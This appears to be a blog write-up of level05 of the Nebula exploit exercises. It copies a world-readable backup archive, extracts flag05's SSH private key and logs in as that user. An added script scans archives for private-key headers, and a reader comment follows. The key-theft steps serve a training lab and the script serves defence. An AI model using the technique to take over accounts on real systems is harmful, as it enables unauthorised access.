Nebula exploit exercises walkthrough – level05

Check the flag05 home directory. You are looking for weak directory permissions.

Let’s start looking in /home/flag05:

level05@nebula:/home/flag05$ ls -asl
total 9
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 .
0 drwxr-xr-x 1 root   root     420 2012-08-27 07:18 ..
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
4 -rw------- 1 flag05 flag05    13 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 flag05 flag05    60 2014-06-03 04:17 .cache
1 -rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
0 drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

Compare to the home directory of level05:

level05@nebula:/home/flag05$ ls -asl /home/level05
total 9
0 drwxr-x--- 1 level05 level05  100 2014-06-04 21:55 .
0 drwxr-xr-x 1 root    root     420 2012-08-27 07:18 ..
4 -rw------- 1 level05 level05  298 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 level05 level05  220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level05 level05   60 2014-06-03 04:15 .cache
1 -rw-r--r-- 1 level05 level05  675 2011-05-18 02:54 .profile

So we have .ssh – the store of SSH keys for the user – and .backup. The .ssh directory is locked down (drwx------), so we can’t look inside it, but .backup is readable by everyone (drwxr-xr-x).

Let’s look in .backup:

level05@nebula:/home/flag05/.backup$ ls -asl
total 2
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 ..
2 -rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

A single backup .tgz. Let’s copy it out to our own home directory and unpack.

level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz ./
level05@nebula:~$ tar zxvf backup-19072011.tgz 
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

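Those are the private (id_rsa) and public (id_rsa.pub) keys for flag05, along with an authorized_keys file. Because we unpacked the archive in our own home directory, the private key now sits at ~/.ssh/id_rsa, which is where ssh looks by default. The keys may well work on the local machine: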

level05@nebula:~$ ssh flag05@localhost
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

Simple. That’s why you should keep your private key private!
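
The same weakness can be looked for from the defender's side. The script below is an added example, not part of the original walkthrough: it finds tar archives that are readable by "other" (like backup-19072011.tgz, mode 664) and reports any member that starts with a private key header. The names audit_backups and demo are made up for the example, the key material is a constructed dummy, and GNU or BSD tar and stat are assumed.

```shell
#!/bin/sh
# Added example. Flags tar archives that are readable by "other" and that
# contain a file starting with a PEM/OpenSSH private key header.

# audit_backups DIR -> one line per finding: "<octal mode> <archive> <member>"
audit_backups() {
    # -perm -004 matches the "other" read bit, as on backup-19072011.tgz
    find "$1" -type f -perm -004 \
        \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) 2>/dev/null |
    while IFS= read -r archive; do
        mode=$(stat -c '%a' "$archive" 2>/dev/null || stat -f '%Lp' "$archive")
        tar -tf "$archive" 2>/dev/null |
        while IFS= read -r member; do
            case "$member" in */) continue ;; esac   # skip directories
            # Stream the member to stdout; inspect only its first line
            if tar -xOf "$archive" "$member" 2>/dev/null | head -n 1 |
               grep -q -e '-----BEGIN .*PRIVATE KEY-----'; then
                printf '%s %s %s\n' "$mode" "$archive" "$member"
            fi
        done
    done
}

# Constructed sample tree: a dummy key archived twice, once with the mode
# from the walkthrough (664) and once locked down (600).
demo() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/src/.ssh" "$d/home/.backup"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'constructed, not a key' \
        '-----END RSA PRIVATE KEY-----' > "$d/src/.ssh/id_rsa"
    echo 'ssh-rsa constructed-sample' > "$d/src/.ssh/id_rsa.pub"
    (cd "$d/src" && tar -czf "$d/home/.backup/open.tgz" .ssh)
    cp "$d/home/.backup/open.tgz" "$d/home/.backup/locked.tgz"
    chmod 664 "$d/home/.backup/open.tgz"
    chmod 600 "$d/home/.backup/locked.tgz"
    audit_backups "$d/home"
    rm -rf "$d"
}

demo
```

On a real system, run audit_backups /home as root so that find can descend into every home directory; only the archive with the "other" read bit set is reported.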

One thought on “Nebula exploit exercises walkthrough – level05”


    marlon

    September 13, 2018 at 5:07pm

    I had to use some other switches for this:
    ssh -i id_rsa flag05@localhost
